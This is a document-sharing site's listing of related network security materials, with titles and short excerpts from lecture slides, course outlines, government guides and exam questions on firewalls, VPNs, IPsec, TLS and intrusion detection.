Chapter 10. Network Security Chapter 10 Network Security 10.1. Chapter 10: Outline 10.1 INTRODUCTION 10.2 CONFIDENTIALITY 10.3 OTHER ASPECTS OF SECURITY 10.4 INTERNET SECURITY 10.5 FIREWALLS 10.2 Chapter 10: Objective We introduce

More information

Network Security. Abusayeed Saifullah. CS 5600 Computer Networks. These slides are adapted from Kurose and Ross 8-1

Network Security. Abusayeed Saifullah. CS 5600 Computer Networks. These slides are adapted from Kurose and Ross 8-1 Network Security Abusayeed Saifullah CS 5600 Computer Networks These slides are adapted from Kurose and Ross 8-1 roadmap 1 What is network security? 2 Principles of cryptography 3 Message integrity, authentication

More information

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10)

APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10) APNIC elearning: Network Security Fundamentals 20 March 2013 10:30 pm Brisbane Time (GMT+10) Introduction Presenter/s Nurul Islam Roman Senior Training Specialist nurul@apnic.net Specialties: Routing &

More information

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls

Firewalls, Tunnels, and Network Intrusion Detection. Firewalls Firewalls, Tunnels, and Network Intrusion Detection 1 Firewalls A firewall is an integrated collection of security measures designed to prevent unauthorized electronic access to a networked computer system.

More information

CS5008: Internet Computing

CS5008: Internet Computing CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is

More information

Network Security Fundamentals

Network Security Fundamentals APNIC elearning: Network Security Fundamentals 27 November 2013 04:30 pm Brisbane Time (GMT+10) Introduction Presenter Sheryl Hermoso Training Officer sheryl@apnic.net Specialties: Network Security IPv6

More information

CS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013

CS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013 CS 356 Lecture 17 and 18 Intrusion Detection Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists

More information

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

2. From a control perspective, the PRIMARY objective of classifying information assets is to: MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected

More information

Authentication applications Kerberos X.509 Authentication services E mail security IP security Web security

Authentication applications Kerberos X.509 Authentication services E mail security IP security Web security UNIT 4 SECURITY PRACTICE Authentication applications Kerberos X.509 Authentication services E mail security IP security Web security Slides Courtesy of William Stallings, Cryptography & Network Security,

More information

Chapter 5. Data Communication And Internet Technology

Chapter 5. Data Communication And Internet Technology Chapter 5 Data Communication And Internet Technology Purpose Understand the fundamental networking concepts Agenda Network Concepts Communication Protocol TCP/IP-OSI Architecture Network Types LAN WAN

More information

Network Security [2] Plain text Encryption algorithm Public and private key pair Cipher text Decryption algorithm. See next slide

Network Security [2] Plain text Encryption algorithm Public and private key pair Cipher text Decryption algorithm. See next slide Network Security [2] Public Key Encryption Also used in message authentication & key distribution Based on mathematical algorithms, not only on operations over bit patterns (as conventional) => much overhead

More information

Network Access Security. Lesson 10

Network Access Security. Lesson 10 Network Access Security Lesson 10 Objectives Exam Objective Matrix Technology Skill Covered Exam Objective Exam Objective Number Firewalls Given a scenario, install and configure routers and switches.

More information

INTRUSION DETECTION SYSTEMS and Network Security

INTRUSION DETECTION SYSTEMS and Network Security INTRUSION DETECTION SYSTEMS and Network Security Intrusion Detection System IDS A layered network security approach starts with : A well secured system which starts with: Up-to-date application and OS

More information

Chapter 8 Security Pt 2

Chapter 8 Security Pt 2 Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,

More information

Content Teaching Academy at James Madison University

Content Teaching Academy at James Madison University Content Teaching Academy at James Madison University 1 2 The Battle Field: Computers, LANs & Internetworks 3 Definitions Computer Security - generic name for the collection of tools designed to protect

More information

CS 665: Computer System Security. Network Security. Usage environment. Sources of vulnerabilities. Information Assurance Module

CS 665: Computer System Security. Network Security. Usage environment. Sources of vulnerabilities. Information Assurance Module CS 665: Computer System Security Network Security Bojan Cukic Lane Department of Computer Science and Electrical Engineering West Virginia University 1 Usage environment Anonymity Automation, minimal human

More information

Chapter 4: Security of the architecture, and lower layer security (network security) 1

Chapter 4: Security of the architecture, and lower layer security (network security) 1 Chapter 4: Security of the architecture, and lower layer security (network security) 1 Outline Security of the architecture Access control Lower layer security Data link layer VPN access Wireless access

More information

: Network Security. Name of Staff: Anusha Linda Kostka Department : MSc SE/CT/IT

: Network Security. Name of Staff: Anusha Linda Kostka Department : MSc SE/CT/IT Subject Code Department Semester : Network Security : XCS593 : MSc SE : Nineth Name of Staff: Anusha Linda Kostka Department : MSc SE/CT/IT Part A (2 marks) 1. What are the various layers of an OSI reference

More information

Internet Privacy Options

Internet Privacy Options 2 Privacy Internet Privacy Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 19 June 2014 Common/Reports/internet-privacy-options.tex, r892 1 Privacy Acronyms

More information

This chapter describes how to set up and manage VPN service in Mac OS X Server.

This chapter describes how to set up and manage VPN service in Mac OS X Server. 6 Working with VPN Service 6 This chapter describes how to set up and manage VPN service in Mac OS X Server. By configuring a Virtual Private Network (VPN) on your server you can give users a more secure

More information

Information Technology Career Cluster Introduction to Cybersecurity Course Number: 11.48100

Information Technology Career Cluster Introduction to Cybersecurity Course Number: 11.48100 Information Technology Career Cluster Introduction to Cybersecurity Course Number: 11.48100 Course Description: Introduction to Cybersecurity is designed to provide students the basic concepts and terminology

More information

Security vulnerabilities in the Internet and possible solutions

Security vulnerabilities in the Internet and possible solutions Security vulnerabilities in the Internet and possible solutions 1. Introduction The foundation of today's Internet is the TCP/IP protocol suite. Since the time when these specifications were finished in

More information

APNIC elearning: IPSec Basics. Contact: training@apnic.net. esec03_v1.0

APNIC elearning: IPSec Basics. Contact: training@apnic.net. esec03_v1.0 APNIC elearning: IPSec Basics Contact: training@apnic.net esec03_v1.0 Overview Virtual Private Networks What is IPsec? Benefits of IPsec Tunnel and Transport Mode IPsec Architecture Security Associations

More information

Client Server Registration Protocol

Client Server Registration Protocol Client Server Registration Protocol The Client-Server protocol involves these following steps: 1. Login 2. Discovery phase User (Alice or Bob) has K s Server (S) has hash[pw A ].The passwords hashes are

More information

IPv6 SECURITY. May 2011. The Government of the Hong Kong Special Administrative Region

IPv6 SECURITY. May 2011. The Government of the Hong Kong Special Administrative Region IPv6 SECURITY May 2011 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without the express

More information

Network System Design Lesson Objectives

Network System Design Lesson Objectives Network System Design Lesson Unit 1: INTRODUCTION TO NETWORK DESIGN Assignment Customer Needs and Goals Identify the purpose and parts of a good customer needs report. Gather information to identify network

More information

Firewalls. Chapter 3

Firewalls. Chapter 3 Firewalls Chapter 3 1 Border Firewall Passed Packet (Ingress) Passed Packet (Egress) Attack Packet Hardened Client PC Internet (Not Trusted) Hardened Server Dropped Packet (Ingress) Log File Internet Border

More information

VPN SECURITY. February 2008. The Government of the Hong Kong Special Administrative Region

VPN SECURITY. February 2008. The Government of the Hong Kong Special Administrative Region VPN SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without the

More information

VPN. Date: 4/15/2004 By: Heena Patel Email:hpatel4@stevens-tech.edu

VPN. Date: 4/15/2004 By: Heena Patel Email:hpatel4@stevens-tech.edu VPN Date: 4/15/2004 By: Heena Patel Email:hpatel4@stevens-tech.edu What is VPN? A VPN (virtual private network) is a private data network that uses public telecommunicating infrastructure (Internet), maintaining

More information

JOB READY ASSESSMENT BLUEPRINT COMPUTER NETWORKING FUNDAMENTALS - PILOT. Test Code: 4514 Version: 01

JOB READY ASSESSMENT BLUEPRINT COMPUTER NETWORKING FUNDAMENTALS - PILOT. Test Code: 4514 Version: 01 JOB READY ASSESSMENT BLUEPRINT COMPUTER NETWORKING FUNDAMENTALS - PILOT Test Code: 4514 Version: 01 Specific Competencies and Skills Tested in this Assessment: PC Principles Identify physical and equipment

More information

a) Encryption is enabled on the access point. b) The conference room network is on a separate virtual local area network (VLAN)

a) Encryption is enabled on the access point. b) The conference room network is on a separate virtual local area network (VLAN) MIS5206 Week 12 Your Name Date 1. Which significant risk is introduced by running the file transfer protocol (FTP) service on a server in a demilitarized zone (DMZ)? a) User from within could send a file

More information

Security. Contents. S-72.3240 Wireless Personal, Local, Metropolitan, and Wide Area Networks 1

Security. Contents. S-72.3240 Wireless Personal, Local, Metropolitan, and Wide Area Networks 1 Contents Security requirements Public key cryptography Key agreement/transport schemes Man-in-the-middle attack vulnerability Encryption. digital signature, hash, certification Complete security solutions

More information

Wireless Security Overview. Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 ageyer@tunitas.com

Wireless Security Overview. Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 ageyer@tunitas.com Wireless Security Overview Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 ageyer@tunitas.com Ground Setting Three Basics Availability Authenticity Confidentiality Challenge

More information

7.1. Remote Access Connection

7.1. Remote Access Connection 7.1. Remote Access Connection When a client uses a dial up connection, it connects to the remote access server across the telephone system. Windows client and server operating systems use the Point to

More information

Secure Network Design: Designing a DMZ & VPN

Secure Network Design: Designing a DMZ & VPN Secure Network Design: Designing a DMZ & VPN DMZ : VPN : pet.ece.iisc.ernet.in/chetan/.../vpn- PPTfinal.PPT 1 IT352 Network Security Najwa AlGhamdi Introduction DMZ stands for DeMilitarized Zone. A network

More information

Internet Firewall CSIS 3230. Internet Firewall. Spring 2012 CSIS 4222. net13 1. Firewalls. Stateless Packet Filtering

Internet Firewall CSIS 3230. Internet Firewall. Spring 2012 CSIS 4222. net13 1. Firewalls. Stateless Packet Filtering Internet Firewall CSIS 3230 A combination of hardware and software that isolates an organization s internal network from the Internet at large Ch 8.8: Packet filtering, firewalls, intrusion detection Ch

More information

Lecture 10: Virtual LANs (VLAN) and Virtual Private Networks (VPN)

Lecture 10: Virtual LANs (VLAN) and Virtual Private Networks (VPN) Lecture 10: Virtual LANs (VLAN) and Virtual Private Networks (VPN) Prof. Shervin Shirmohammadi SITE, University of Ottawa Prof. Shervin Shirmohammadi CEG 4185 10-1 Virtual LANs Description: Group of devices

More information

Cornerstones of Security

Cornerstones of Security Internet Security Cornerstones of Security Authenticity the sender (either client or server) of a message is who he, she or it claims to be Privacy the contents of a message are secret and only known to

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

INF3510 Information Security University of Oslo Spring 2011. Lecture 9 Communication Security. Audun Jøsang

INF3510 Information Security University of Oslo Spring 2011. Lecture 9 Communication Security. Audun Jøsang INF3510 Information Security University of Oslo Spring 2011 Lecture 9 Communication Security Audun Jøsang Outline Network security concepts Communication security Perimeter security Protocol architecture

More information

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection.

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection. A firewall is a software- or hardware-based network security system that allows or denies network traffic according to a set of rules. Firewalls can be categorized by their location on the network: A network-based

More information

13 Virtual Private Networks 13.1 Point-to-Point Protocol (PPP) 13.2 Layer 2/3/4 VPNs 13.3 Multi-Protocol Label Switching 13.4 IPsec Transport Mode

13 Virtual Private Networks 13.1 Point-to-Point Protocol (PPP) 13.2 Layer 2/3/4 VPNs 13.3 Multi-Protocol Label Switching 13.4 IPsec Transport Mode 13 Virtual Private Networks 13.1 Point-to-Point Protocol (PPP) PPP-based remote access using dial-in PPP encryption control protocol (ECP) PPP extensible authentication protocol (EAP) 13.2 Layer 2/3/4

More information

Chapter 8 Security. IC322 Fall 2014. Computer Networking: A Top Down Approach. 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012

Chapter 8 Security. IC322 Fall 2014. Computer Networking: A Top Down Approach. 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 Chapter 8 Security IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross, All

More information

Other VPNs TLS/SSL, PPTP, L2TP. Advanced Computer Networks SS2005 Jürgen Häuselhofer

Other VPNs TLS/SSL, PPTP, L2TP. Advanced Computer Networks SS2005 Jürgen Häuselhofer Other VPNs TLS/SSL, PPTP, L2TP Advanced Computer Networks SS2005 Jürgen Häuselhofer Overview Introduction to VPNs Why using VPNs What are VPNs VPN technologies... TLS/SSL Layer 2 VPNs (PPTP, L2TP, L2TP/IPSec)

More information

Post-Class Quiz: Telecommunication & Network Security Domain

Post-Class Quiz: Telecommunication & Network Security Domain 1. What type of network is more likely to include Frame Relay, Switched Multi-megabit Data Services (SMDS), and X.25? A. Local area network (LAN) B. Wide area network (WAN) C. Intranet D. Internet 2. Which

More information

DATA SECURITY 1/12. Copyright Nokia Corporation 2002. All rights reserved. Ver. 1.0

DATA SECURITY 1/12. Copyright Nokia Corporation 2002. All rights reserved. Ver. 1.0 DATA SECURITY 1/12 Copyright Nokia Corporation 2002. All rights reserved. Ver. 1.0 Contents 1. INTRODUCTION... 3 2. REMOTE ACCESS ARCHITECTURES... 3 2.1 DIAL-UP MODEM ACCESS... 3 2.2 SECURE INTERNET ACCESS

More information

Firewalls. Ahmad Almulhem March 10, 2012

Firewalls. Ahmad Almulhem March 10, 2012 Firewalls Ahmad Almulhem March 10, 2012 1 Outline Firewalls The Need for Firewalls Firewall Characteristics Types of Firewalls Firewall Basing Firewall Configurations Firewall Policies and Anomalies 2

More information

EUCIP - IT Administrator. Module 5 IT Security. Version 2.0

EUCIP - IT Administrator. Module 5 IT Security. Version 2.0 EUCIP - IT Administrator Module 5 IT Security Version 2.0 Module 5 Goals Module 5 Module 5, IT Security, requires the candidate to be familiar with the various ways of protecting data both in a single

More information

Chapter 7 Transport-Level Security

Chapter 7 Transport-Level Security Cryptography and Network Security Chapter 7 Transport-Level Security Lectured by Nguyễn Đức Thái Outline Web Security Issues Security Socket Layer (SSL) Transport Layer Security (TLS) HTTPS Secure Shell

More information

12/8/2015. Review. Final Exam. Network Basics. Network Basics. Network Basics. Network Basics. 12/10/2015 Thursday 5:30~6:30pm Science S-3-028

12/8/2015. Review. Final Exam. Network Basics. Network Basics. Network Basics. Network Basics. 12/10/2015 Thursday 5:30~6:30pm Science S-3-028 Review Final Exam 12/10/2015 Thursday 5:30~6:30pm Science S-3-028 IT443 Network Security Administration Instructor: Bo Sheng True/false Multiple choices Descriptive questions 1 2 Network Layers Application

More information

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7 20-CS-6053-00X Network Security Spring, 2014 An Introduction To Network Security Week 1 January 7 Attacks Criminal: fraud, scams, destruction; IP, ID, brand theft Privacy: surveillance, databases, traffic

More information

Network Security. Vorlesung Kommunikation und Netze SS 10 E. Nett

Network Security. Vorlesung Kommunikation und Netze SS 10 E. Nett Network Security Internet not originally designed with (much) security in mind original vision: a group of mutually trusting users attached to a transparent network Security considerations in all layers!

More information

Chapter 12 Supporting Network Address Translation (NAT)

Chapter 12 Supporting Network Address Translation (NAT) [Previous] [Next] Chapter 12 Supporting Network Address Translation (NAT) About This Chapter Network address translation (NAT) is a protocol that allows a network with private addresses to access information

More information

Final exam review, Fall 2005 FSU (CIS-5357) Network Security

Final exam review, Fall 2005 FSU (CIS-5357) Network Security Final exam review, Fall 2005 FSU (CIS-5357) Network Security Instructor: Breno de Medeiros 1. What is an insertion attack against a NIDS? Answer: An insertion attack against a network intrusion detection

More information

INFORMATION SECURITY PRINCIPLES AND PRACTICE

INFORMATION SECURITY PRINCIPLES AND PRACTICE INFORMATION SECURITY PRINCIPLES AND PRACTICE Mark Stamp San Jose State University 'INTERSCIENCE A JOHN WILEY & SONS, INC., PUBLICATION Preface About The Author Acknowledgments xv xix xxi 1 INTRODUCTION

More information

Internet Services & Protocols

Internet Services & Protocols Department of Computer Science Institute for System Architecture, Chair for Computer Networks Internet Services & Protocols Internet (In)Security Dr.-Ing. Stephan Groß Room: INF 3099 E-Mail: stephan.gross@tu-dresden.de

More information

Firewalls, IDS and IPS

Firewalls, IDS and IPS Session 9 Firewalls, IDS and IPS Prepared By: Dr. Mohamed Abd-Eldayem Ref.: Corporate Computer and Network Security By: Raymond Panko Basic Firewall Operation 2. Internet Border Firewall 1. Internet (Not

More information

Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003

Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003 http://technet.microsoft.com/en-us/library/cc757501(ws.10).aspx Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003 Updated: October 7, 2005 Applies To: Windows Server 2003 with

More information

Based on Computer Networking, 4 th Edition by Kurose and Ross

Based on Computer Networking, 4 th Edition by Kurose and Ross Computer Networks Ethernet Hubs and Switches Based on Computer Networking, 4 th Edition by Kurose and Ross Ethernet dominant wired LAN technology: cheap $20 for NIC first widely used LAN technology Simpler,

More information

Virtual Private Networks

Virtual Private Networks Virtual Private Networks The Ohio State University Columbus, OH 43210 Jain@cse.ohio-State.Edu http://www.cse.ohio-state.edu/~jain/ 1 Overview Types of VPNs When and why VPN? VPN Design Issues Security

More information

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 12 Applying Cryptography

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 12 Applying Cryptography Security+ Guide to Network Security Fundamentals, Third Edition Chapter 12 Applying Cryptography Objectives Define digital certificates List the various types of digital certificates and how they are used

More information

Proxy Server, Network Address Translator, Firewall. Proxy Server

Proxy Server, Network Address Translator, Firewall. Proxy Server Proxy Server, Network Address Translator, Firewall 1 Proxy Server 2 1 Introduction What is a proxy server? Acts on behalf of other clients, and presents requests from other clients to a server. Acts as

More information

INTRODUCTION TO FIREWALL SECURITY

INTRODUCTION TO FIREWALL SECURITY INTRODUCTION TO FIREWALL SECURITY SESSION 1 Agenda Introduction to Firewalls Types of Firewalls Modes and Deployments Key Features in a Firewall Emerging Trends 2 Printed in USA. What Is a Firewall DMZ

More information

Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP

Overview. Securing TCP/IP. Introduction to TCP/IP (cont d) Introduction to TCP/IP Overview Securing TCP/IP Chapter 6 TCP/IP Open Systems Interconnection Model Anatomy of a Packet Internet Protocol Security (IPSec) Web Security (HTTP over TLS, Secure-HTTP) Lecturer: Pei-yih Ting 1 2

More information

Chapter 6 Electronic Mail Security

Chapter 6 Electronic Mail Security Cryptography and Network Security Chapter 6 Electronic Mail Security Lectured by Nguyễn Đức Thái Outline Pretty Good Privacy S/MIME 2 Electronic Mail Security In virtually all distributed environments,

More information

Network Security. Tampere Seminar 23rd October 2008. Overview Switch Security Firewalls Conclusion

Network Security. Tampere Seminar 23rd October 2008. Overview Switch Security Firewalls Conclusion Network Security Tampere Seminar 23rd October 2008 1 Copyright 2008 Hirschmann 2008 Hirschmann Automation and and Control GmbH. Contents Overview Switch Security Firewalls Conclusion 2 Copyright 2008 Hirschmann

More information

Key Management (Distribution and Certification) (1)

Key Management (Distribution and Certification) (1) Key Management (Distribution and Certification) (1) Remaining problem of the public key approach: How to ensure that the public key received is really the one of the sender? Illustration of the problem

More information

12/3/08. Security in Wireless LANs and Mobile Networks. Wireless Magnifies Exposure Vulnerability. Mobility Makes it Difficult to Establish Trust

12/3/08. Security in Wireless LANs and Mobile Networks. Wireless Magnifies Exposure Vulnerability. Mobility Makes it Difficult to Establish Trust Security in Wireless LANs and Mobile Networks Wireless Magnifies Exposure Vulnerability Information going across the wireless link is exposed to anyone within radio range RF may extend beyond a room or

More information

Networking Technology Online Course Outline

Networking Technology Online Course Outline Networking Technology Online Course Outline Introduction Networking Technology Introduction Welcome to InfoComm University About InfoComm International About Networking Technology Network Technology Course

More information

Security (II) ISO 7498-2: Security Architecture of OSI Reference Model. Outline. Course Outline: Fundamental Topics. EE5723/EE4723 Spring 2012

Security (II) ISO 7498-2: Security Architecture of OSI Reference Model. Outline. Course Outline: Fundamental Topics. EE5723/EE4723 Spring 2012 Course Outline: Fundamental Topics System View of Network Security Network Security Model Security Threat Model & Security Services Model Overview of Network Security Security Basis: Cryptography Secret

More information

E-Commerce Security. The Client-Side Vulnerabilities. Securing the Data Transaction LECTURE 7 (SECURITY)

E-Commerce Security. The Client-Side Vulnerabilities. Securing the Data Transaction LECTURE 7 (SECURITY) E-Commerce Security An e-commerce security system has four fronts: LECTURE 7 (SECURITY) Web Client Security Data Transport Security Web Server Security Operating System Security A safe e-commerce system

More information

Basic Networking Concepts. 1. Introduction 2. Protocols 3. Protocol Layers 4. Network Interconnection/Internet

Basic Networking Concepts. 1. Introduction 2. Protocols 3. Protocol Layers 4. Network Interconnection/Internet Basic Networking Concepts 1. Introduction 2. Protocols 3. Protocol Layers 4. Network Interconnection/Internet 1 1. Introduction -A network can be defined as a group of computers and other devices connected

More information

Architecture Overview

Architecture Overview Architecture Overview Design Fundamentals The networks discussed in this paper have some common design fundamentals, including segmentation into modules, which enables network traffic to be isolated and

More information

CMPT 471 Networking II

CMPT 471 Networking II CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access

More information

Layered protocol (service) architecture

Layered protocol (service) architecture Layered protocol (service) architecture The Internet is complex! many pieces : hosts access network routers links of various media applications protocols Question: Is there any hope of organizing a structure

More information

Transport Level Security

Transport Level Security Transport Level Security Overview Raj Jain Washington University in Saint Louis Saint Louis, MO 63130 Jain@cse.wustl.edu Audio/Video recordings of this lecture are available at: http://www.cse.wustl.edu/~jain/cse571-14/

More information

NETWORK SECURITY (W/LAB) Course Syllabus

NETWORK SECURITY (W/LAB) Course Syllabus 6111 E. Skelly Drive P. O. Box 477200 Tulsa, OK 74147-7200 NETWORK SECURITY (W/LAB) Course Syllabus Course Number: NTWK-0008 OHLAP Credit: Yes OCAS Code: 8131 Course Length: 130 Hours Career Cluster: Information

More information

Security+ Guide to Network Security Fundamentals, Fourth Edition. Chapter 6 Network Security

Security+ Guide to Network Security Fundamentals, Fourth Edition. Chapter 6 Network Security Security+ Guide to Network Security Fundamentals, Fourth Edition Chapter 6 Network Security Objectives List the different types of network security devices and explain how they can be used Define network

More information

Lecture 17 - Network Security

Lecture 17 - Network Security Lecture 17 - Network Security CMPSC 443 - Spring 2012 Introduction Computer and Network Security Professor Jaeger www.cse.psu.edu/~tjaeger/cse443-s12/ Idea Why donʼt we just integrate some of these neat

More information

Fundamentals of Network Security - Theory and Practice-

Fundamentals of Network Security - Theory and Practice- Fundamentals of Network Security - Theory and Practice- Program: Day 1... 1 1. General Security Concepts... 1 2. Identifying Potential Risks... 1 Day 2... 2 3. Infrastructure and Connectivity... 2 4. Monitoring

More information

Firewalls N E T W O R K ( A N D D ATA ) S E C U R I T Y 2 01 5 / 2 01 6 P E D R O B R A N D Ã O M A N U E L E D U A R D O C O R R E I A

Firewalls N E T W O R K ( A N D D ATA ) S E C U R I T Y 2 01 5 / 2 01 6 P E D R O B R A N D Ã O M A N U E L E D U A R D O C O R R E I A Firewalls N E T W O R K ( A N D D ATA ) S E C U R I T Y 2 01 5 / 2 01 6 P E D R O B R A N D Ã O M A N U E L E D U A R D O C O R R E I A Slides are based on slides by Dr Lawrie Brown (UNSW@ADFA) for Computer

More information

Implementing Secured Converged Wide Area Networks (ISCW) Version 1.0

Implementing Secured Converged Wide Area Networks (ISCW) Version 1.0 COURSE OVERVIEW Implementing Secure Converged Wide Area Networks (ISCW) v1.0 is an advanced instructor-led course that introduces techniques and features that enable or enhance WAN and remote access solutions.

More information

Network Security. by David G. Messerschmitt. Secure and Insecure Authentication. Security Flaws in Public Servers. Firewalls and Packet Filtering

Network Security. by David G. Messerschmitt. Secure and Insecure Authentication. Security Flaws in Public Servers. Firewalls and Packet Filtering Network Security by David G. Messerschmitt Supplementary section for Understanding Networked Applications: A First Course, Morgan Kaufmann, 1999. Copyright notice: Permission is granted to copy and distribute

More information

CS 356 Lecture 19 and 20 Firewalls and Intrusion Prevention. Spring 2013

CS 356 Lecture 19 and 20 Firewalls and Intrusion Prevention. Spring 2013 CS 356 Lecture 19 and 20 Firewalls and Intrusion Prevention Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access

More information

ISM/ISC Middleware Module

ISM/ISC Middleware Module ISM/ISC Middleware Module Lecture 13: Security for Middleware Applications Dr Geoff Sharman Visiting Professor in Computer Science Birkbeck College Geoff Sharman Sept 07 Lecture 13 Aims to: 2 Show why

More information

Network Concepts. IT 4823 Information Security Concepts and Administration. The Network Environment. Resilience. Network Topology. Transmission Media

Network Concepts. IT 4823 Information Security Concepts and Administration. The Network Environment. Resilience. Network Topology. Transmission Media IT 4823 Information Security Concepts and Administration March 17 Network Threats Notice: This session is being recorded. Happy 50 th, Vanguard II March 17, 1958 R.I.P. John Backus March 17, 2007 Copyright

More information

Recommended IP Telephony Architecture

Recommended IP Telephony Architecture Report Number: I332-009R-2006 Recommended IP Telephony Architecture Systems and Network Attack Center (SNAC) Updated: 1 May 2006 Version 1.0 SNAC.Guides@nsa.gov This Page Intentionally Left Blank ii Warnings

More information

Högskolan i Halmstad Sektionen för Informationsvetenskap, Data- Och Elektroteknik (IDÉ) Ola Lundh. Name (in block letters) :

Högskolan i Halmstad Sektionen för Informationsvetenskap, Data- Och Elektroteknik (IDÉ) Ola Lundh. Name (in block letters) : Högskolan i Halmstad Sektionen för Informationsvetenskap, Data- Och Elektroteknik (IDÉ) Ola Lundh Written Exam in Network Security ANSWERS May 28, 2009. Allowed aid: Writing material. Name (in block letters)

More information

Securing Modern Substations With an Open Standard Network Security Solution. Kevin Leech Schweitzer Engineering Laboratories, Inc.

Securing Modern Substations With an Open Standard Network Security Solution. Kevin Leech Schweitzer Engineering Laboratories, Inc. Securing Modern Substations With an Open Standard Network Security Solution Kevin Leech Schweitzer Engineering Laboratories, Inc. Copyright SEL 2009 What Makes a Cyberattack Unique? While the resources

More information

Firewalls. CEN 448 Security and Internet Protocols Chapter 20 Firewalls

Firewalls. CEN 448 Security and Internet Protocols Chapter 20 Firewalls CEN 448 Security and Internet Protocols Chapter 20 Firewalls Dr. Mostafa Hassan Dahshan Computer Engineering Department College of Computer and Information Sciences King Saud University mdahshan@ccis.ksu.edu.sa

More information

Chapter 4 Network Layer

Chapter 4 Network Layer Chapter 4 Network Layer A note on the use of these ppt slides: We re making these slides freely available to all (faculty, students, readers). They re in PowerPoint form so you can add, modify, and delete

More information

1.264 Lecture 37. Telecom: Enterprise networks, VPN

1.264 Lecture 37. Telecom: Enterprise networks, VPN 1.264 Lecture 37 Telecom: Enterprise networks, VPN 1 Enterprise networks Connections within enterprise External connections Remote offices Employees Customers Business partners, supply chain partners Patients

More information

Lecture Objectives. Lecture 8 Mobile Networks: Security in Wireless LANs and Mobile Networks. Agenda. References

Lecture Objectives. Lecture 8 Mobile Networks: Security in Wireless LANs and Mobile Networks. Agenda. References Lecture Objectives Wireless Networks and Mobile Systems Lecture 8 Mobile Networks: Security in Wireless LANs and Mobile Networks Introduce security vulnerabilities and defenses Describe security functions

More information

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped

More information